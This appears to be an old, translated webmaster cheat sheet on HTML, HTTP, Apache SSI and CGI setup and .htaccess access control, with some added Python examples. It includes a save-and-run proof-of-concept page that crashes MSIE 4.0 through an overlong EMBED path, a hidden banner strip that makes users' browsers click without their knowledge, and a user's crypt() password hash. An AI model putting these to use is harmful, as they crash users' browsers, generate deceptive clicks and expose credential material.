index.html If a directory is requested, index is served;
if it does not exist, a plain listing of the directory is served instead
HEADER.html Its contents are added before the start of the listing
README.html Its contents are added at the end of the listing
.htaccess Control file with local settings for the current directory
These directives are worth looking into:
Alias - the expansion has to be stored somewhere, and the server will
substitute it.
But where exactly?
Sets an overall indent to the right.
A fragment of text shifted to the right
Horizontal rule
End of paragraph
Hard line break
Text between these tags will not wrap
onto a new line, however long it is
Physical styles
Bold bold text Italic italic text Underline underlined text Works only in Netscape 3
Typewriter fixed-width font text Strike strikethrough text
Logical styles
Definition. The word being defined italic
Emphasis. Stress italic
Titles of books. Citation italic
Program. Program text fixed
User keyboard entry. bold fixed
Status message fixed
Variable. italic Strong emphasis. bold
An address is set off italic
Controlling colors and fonts
_BODY_ tags take effect only if they are placed at the very beginning of the document
This is how custom colors are set for the whole document
And this is how mourning colors were made during protests.
Larger text, colored red, with a specified font face
From here on the text uses a font of the specified size
as well as a background sound
If text is needed beside
an image
Offset of the text from the image
ALT - what to display if the image cannot be loaded,
LOWSRC - load this small image first, before drawing the large one
This is how a BACKGROUND is set
Tables -
tr - defines a row Column
Column
Inside a table there can be a tag like this: Subheading?
LARGE TEXT IN A BLOCK
transparent spacing: spacer
Table with a colored block heading and a border
About the HTTP/1.* protocol
The client opens a TCP connection to the host www.host.com on a port
(usually 80) and sends
GET /local/url/file/name.html HTTP/1.0
Host: www.host.com
Referer: url_of_the_document_the_client_was_on
A number of further headers
that tell the server who it is dealing with.
All of them are optional, apart from GET
. . .
^M^J - empty line - end of headers - end of request
The server's response comes back:
HTTP headers
on several lines
^M^J - empty line
The requested document itself, as is
Exercise: type
$ telnet www 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /index.html HTTP/1.0
And then press Enter twice
How does download resumption work in the HTTP/1.1 protocol?
A special field "Range: bytes=nnn-" is inserted into the request.
A server that supports resumption returns code 206 ("Partial Content") and
sends the requested part of the file. If the server does not support
resumption, it simply returns 200 and sends the whole file, as for an
ordinary request.
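The client side of this resume logic, as an added example that is not part of the original page: it builds the Range request and merges the answer, covering the case where the server ignores Range and answers 200 with the whole file. The function names and the sample responses are constructed for illustration.

```python
def build_resume_request(path, host, have_bytes):
    """Build a GET that asks for everything from byte offset have_bytes onward."""
    lines = [f"GET {path} HTTP/1.1", f"Host: {host}", "Connection: close"]
    if have_bytes > 0:
        lines.append(f"Range: bytes={have_bytes}-")
    # Headers end with an empty line (CR LF CR LF).
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii")


def parse_response(raw):
    """Split a raw response into (status code, lower-cased headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status_line, *header_lines = head.decode("iso-8859-1").split("\r\n")
    status = int(status_line.split(" ", 2)[1])
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def apply_response(partial, raw):
    """Return the file contents after merging the response into the partial data."""
    status, headers, body = parse_response(raw)
    if status == 200:
        # Server ignored Range and sent the whole file: discard the partial copy.
        return body
    if status == 206:
        # "Content-Range: bytes START-END/TOTAL" must start exactly where we stopped.
        unit, _, span = headers.get("content-range", "").partition(" ")
        start = span.split("-", 1)[0]
        if unit != "bytes" or not start.isdigit() or int(start) != len(partial):
            raise ValueError("Content-Range does not match the requested offset")
        return partial + body
    raise ValueError(f"unexpected status {status}")


# Constructed sample data: a 10-byte file of which 4 bytes were already received.
PARTIAL = b"0123"
RESP_206 = (b"HTTP/1.1 206 Partial Content\r\nContent-Range: bytes 4-9/10\r\n"
            b"Content-Length: 6\r\n\r\n456789")
RESP_200 = b"HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n0123456789"
```

Appending a 200 body to the partial file is the usual way a resumed download gets silently corrupted, which is why the status code is checked before any byte is written.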
SSI - Server Side Includes
The full specification is available, for example, at www.apache.org
0. To make SSI files set Last-modified, add to the config
XBitHack full
and run chmod g+x file.shtml on them
1. For SSI to be executed, the following must be set in the server
configuration files:
/etc/httpd/conf/access.conf :------------------------
# "Enable"
# or even Options All
Options +Includes
/etc/httpd/conf/srm.conf :------------------------
AddType text/html .shtml
AddHandler server-parsed .shtml
2. SSI is then processed only in files with the .shtml extension
Examples:
charset=
The value will often be enclosed in double quotes; many commands
only allow a single attribute-value pair.
The allowed ELEMENTS are:
config - parsing parameters
Attributes of config
errmsg - error message sent to the client
sizefmt - file size format
timefmt - file modification date format
var - print the named variable
exec - execute a shell command or a CGI script
cgi - (%-encoded) URL relative path to the CGI script.
cmd - execute a shell command
fsize - print the file size
file - relative file name
virtual - (%-encoded) URL-path of the file, relative
flastmod - last modification time of the file
include - insert a document
file - the file to insert
virtual - URL, on this same host only
Include variables
These are available for the echo command, and to any program
invoked by the document.
DATE_GMT
The current date in Greenwich Mean Time.
DATE_LOCAL
The current date in the local time zone.
DOCUMENT_NAME
The filename (excluding directories) of the document requested
by the user.
DOCUMENT_URI
The (%-decoded) URL path of the document requested by the user.
Note that in the case of nested
include files, this is not the URL for the current document.
LAST_MODIFIED
The last modification date of the document requested by the user.
If server side includes are enabled, you will see data values below:
The date is:
The current version of the server
The CGI gateway version
The server name
This file is called:
This file's URI
The query string
This file was last modified:
The size of the unprocessed file
sample.html was last modified
You are using
You came from
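# Emulation of SSI in a Perl CGI script
# (the two directive patterns are assumed; they follow the standard SSI comment syntax)
if (/<!--#include\s+(?:file|virtual)="([^"]+)"\s*-->/) {
    $inc = $1;               # name of the document to insert
    print $`; $tmp = $';     # print the text before the directive, keep the text after it
    # 3-argument open: $inc is only ever read as a file name
    open(INC, '<', $inc) || die "Can't Open $inc: $!\n";
    while (<INC>) {
        if (/<!--#echo\s+var="DATE_LOCAL"\s*-->/) {
            # localtime: month is 0-based, year counts from 1900
            @time = localtime ( time() ); $time[4]++; $time[5] += 1900;
            if ($time[4] < 10) { $time[4] = "0" . "$time[4]"; }
            s/<!--#echo\s+var="DATE_LOCAL"\s*-->/$time[3].$time[4].$time[5]/g;
        }
        print $_;
    }
    close(INC);
    print "$tmp";
}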
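Because exec cmd and exec cgi in the element list above run programs from inside a page, it is worth knowing where a document tree uses them before Includes is switched on. The audit helper below is an added example, not code from the original page; its function names and the sample document are constructed.

```python
import re

# Matches <!--#element attribute="value" ... -->
DIRECTIVE = re.compile(r'<!--#(\w+)((?:\s+\w+="[^"]*")*)\s*-->')
ATTRIBUTE = re.compile(r'(\w+)="([^"]*)"')


def parse_directives(text):
    """Yield (line number, element, {attribute: value}) for every SSI directive."""
    for match in DIRECTIVE.finditer(text):
        line = text.count("\n", 0, match.start()) + 1
        yield line, match.group(1).lower(), dict(ATTRIBUTE.findall(match.group(2)))


def audit(text):
    """Return (line, finding) pairs for directives that run a program."""
    findings = []
    for line, element, attrs in parse_directives(text):
        if element == "exec":
            for kind in ("cmd", "cgi"):
                if kind in attrs:
                    findings.append((line, f"exec {kind}: {attrs[kind]}"))
        elif element == "include":
            # include virtual can also point at a CGI script on the same host.
            target = attrs.get("virtual", "").split("?", 1)[0]
            if "/cgi-bin/" in target or target.endswith(".cgi"):
                findings.append((line, f"include virtual runs CGI: {target}"))
    return findings


# Constructed sample document (not taken from the page).
SAMPLE = """<html>
<!--#config timefmt="%d.%m.%Y" -->
Modified: <!--#flastmod file="index.shtml" -->
<!--#include virtual="/footer.html" -->
<!--#exec cmd="uptime" -->
<!--#include virtual="/cgi-bin/counter.cgi" -->
</html>
"""

if __name__ == "__main__":
    for line, finding in audit(SAMPLE):
        print(f"line {line}: {finding}")
```

Apache's Options +IncludesNOEXEC enables SSI while disabling both exec forms; include virtual of a CGI script stays possible, which is why the helper reports it separately.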
Access control via httpd.conf
SetEnvIfNoCase Referer rusf\.ru internal_referer
SetEnvIfNoCase User-Agent Teleport internal_referer
SetEnvIfNoCase User-Agent Vampire internal_referer
SetEnvIfNoCase User-Agent ReGet internal_referer
SetEnvIfNoCase User-Agent GetRight internal_referer
SetEnvIfNoCase User-Agent Wget internal_referer
ErrorDocument 403 http://rusf.ru/books/index.htm
order deny,allow
deny from all
allow from env=internal_referer
# No offline browsers in robots.txt
User-Agent: DISCo Pump, Wget, WebZIP, Teleport Pro, WebSnake, Offline Explorer, Web-By-Mail
Disallow: /
and the external programs it invokes: gateways.
The CGI script itself must be placed in /home/httpd/cgi-bin,
then it will be found (or in other directories described in access.conf)
Data is passed on the command line, through environment
variables and through standard input. It is returned on
standard output; at the start there must be the "magic line"
If you add to the configuration file
/etc/httpd/conf/srm.conf :------------------------
AddType application/x-httpd-cgi .cgi
then CGI scripts can be placed in any subdirectory of the document
tree, with the .cgi extension
Forms and indexes
Open the file and position at the line with the "cl" pattern
http://hoohoo.ncsa.uiuc.edu/file.html#cl
Request for a CGI script with no extra path information and no query.
http://hoohoo.ncsa.uiuc.edu/cgi-bin/test-cgi
Request for a script with extra path information, and no query.
http://hoohoo.ncsa.uiuc.edu/cgi-bin/test-cgi/extra/path
Request for a script with no extra path information, and an ISINDEX query.
http://hoohoo.ncsa.uiuc.edu/cgi-bin/test-cgi?query
Request for a script with extra path information as well as an ISINDEX query.
http://hoohoo.ncsa.uiuc.edu/cgi-bin/test-cgi/extra/path?a+query
The same program is invoked, but it is passed 0, 1, 1 or 2 arguments:
extra path - the "additional path" that follows the name of the executable
query - the long string after the "?" sign
image maps work through extra path - they are passed the name of the image descriptor
query is passed by a filled-in ISINDEX
The following parameters are passed to a CGI script:
Parameters are passed in environment variables.
REMOTE_ADDR=127.0.0.1
REMOTE_HOST=localhost
HTTP_REFERER=http://www.ac.msk.su:80/cgi-bin/html-KOI?KSP/bachurin.txt
REQUEST_METHOD=GET
QUERY_STRING=query
PATH_INFO=/marshrut
PATH_TRANSLATED=/home/httpd/docs/marshrut
SCRIPT_NAME=/cgi-bin/proba
HTTP_USER_AGENT=NCSA Mosaic for the X Window System/2.4 libwww/2.12 modified
And now, here is how forms with checkboxes are written:
# ISINDEX - the query parameter is passed to the CGI program in $1
# In a form with METHOD=GET, a command is invoked and the argument is passed
# to it in the environment variable QUERY_STRING
# http://hoohoo.ncsa.uiuc.edu/cgi-bin/test-cgi?button1=on&button2=off
# And here is how POST and PUT work. The additional information is pushed
by the client to the server. The server feeds it to the CGI program on standard input.
The length of the file being sent is set in the environment variable CONTENT_LENGTH
and the data type in CONTENT_TYPE
FORM ACTION="http://hoohoo.ncsa.uiuc.edu/cgi-bin/test-cgi" METHOD="POST"
What we send back to the client:
Status: 200 OK
Status: 404 File not found
Content-type: text/html
The content that is passed through our server to the client
If I generate not the content but only a reference to it, then:
Location: /path/doc.txt
or
Location: gopher://gopher.ncsa.uiuc.edu/
We generate the text in raw server form; it goes to the
client directly, without additional filtering:
--- start of output ---
HTTP/1.0 200 OK
Date: Tuesday, 26-Dec-95 15:17:10 GMT
Server: NCSA/1.3
MIME-version: 1.0
Content-type: text/html
Last-modified: Tuesday, 24-Dec-95 15:15:41 GMT
Content-length: 3132
This is a plaintext document generated on the fly just for you.
--- end of output ---
Substitute the corresponding values of the variables there
$SERVER_PROTOCOL $SERVER_SOFTWARE
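A CGI program that follows the conventions of this section, as an added example (not code from the original page): it takes its input from QUERY_STRING or, for POST, from exactly CONTENT_LENGTH bytes of standard input, and answers with header lines, an empty line and the document. The function names and the MAX_BODY limit are assumptions; every client-supplied value is HTML-escaped before it is echoed.

```python
import html
import os
import sys
from urllib.parse import parse_qs

MAX_BODY = 64 * 1024  # assumed upper bound on an accepted POST body


def read_form(environ, stdin):
    """Return form fields from QUERY_STRING (GET) or standard input (POST)."""
    if environ.get("REQUEST_METHOD", "GET") == "POST":
        length = environ.get("CONTENT_LENGTH", "")
        if not length.isdigit() or int(length) > MAX_BODY:
            raise ValueError("missing or oversized CONTENT_LENGTH")
        # Read exactly CONTENT_LENGTH bytes; the server does not signal EOF.
        data = stdin.read(int(length)).decode("utf-8", "replace")
    else:
        data = environ.get("QUERY_STRING", "")
    return parse_qs(data, keep_blank_values=True)


def respond(environ, stdin):
    """Build the full CGI output: header lines, an empty line, then the document."""
    try:
        form = read_form(environ, stdin)
    except ValueError as err:
        return f"Status: 400 Bad Request\r\nContent-type: text/plain\r\n\r\n{err}\n"
    rows = "".join(
        # Escape everything that came from the client before it reaches HTML.
        f"<li>{html.escape(name)} = {html.escape(', '.join(values))}</li>\n"
        for name, values in sorted(form.items())
    )
    path = html.escape(environ.get("PATH_INFO", ""))
    return ("Content-type: text/html\r\n\r\n"
            f"<p>extra path: {path}</p>\n<ul>\n{rows}</ul>\n")


if __name__ == "__main__":
    sys.stdout.write(respond(os.environ, sys.stdin.buffer))
```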
Tricks
Automatic URL substitution with a timeout. Put at the start of the document:
Then comes the local HTML document, which after 12 seconds will be
automatically replaced by the URL given above
In general, the META HTTP-EQUIV tag lets you set additional fields in the
document's HTTP header. For example, "forcing" the charset:
Content-type: text/html
Set-Cookie: cookiename=valueofcookie; expires=Saturday, 28-Feb-96 23:59:59 GMT; path=/cgi-bin/mycgiprogram
The client will automatically send this thing back to our server once it has received it
For details see http://citforum.ru/win/internet/html/c_what_is.shtml
If you send this, the client will stay where it is and will not
follow the link
Status: 204 No Content
And a link like this lets you pre-fill some fields of a mailto message
tets
Self-clicking letter
> The idea was to send it a message when the mouse is moved over the banner.
> (When a banner is interesting, people often move the cursor to it)
> But I somehow couldn't figure out how to implement this without a hidden frame.
In the rules you establish that the _standard code_
of your network contains:
When the client _crosses_ your one-pixel strip with the mouse
from below, there will be an auto-click, and so as not to bother the client,
have your http://koshelev.ru/cgi-bin/bannerOver
return code 204 No Content, i.e. _do not go_ to the link but
stay on the old page.
A link that is followed automatically
It is enough to move the mouse over this link, and the browser will follow
the link without a click.
Simple exploits
MSIE 4.0. 4.01 can be crashed with a little help of the < EMBED > tag.
<EMBED SRC=file://C|/A.ABOUT_200_CHARACTERS_HERE___________________>
opens a dialog box and closes IE 4.0. the long file extension causes stack overrun.
--------cut here and save as crashmsie.html---------------------
Trying to crash IE 4.0
<EMBED
SRC=file://C|/A.012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789>
40
80 160 170 180 190 200
</HTML>
---------------------------------------------------------------
Closing directories to external clients
Create in the directory a file .htaccess with the following contents
order deny,allow
deny from all
allow from polimos.ras.ru localhost
Order deny,allow
Allow from .abc.ru
Deny from all
Satisfy any
AuthType Basic
AuthName lenta.ru
AuthUserFile /home/www/passwd
# moshkow:1HrhNpfYnwTau standard crypt()
require valid-user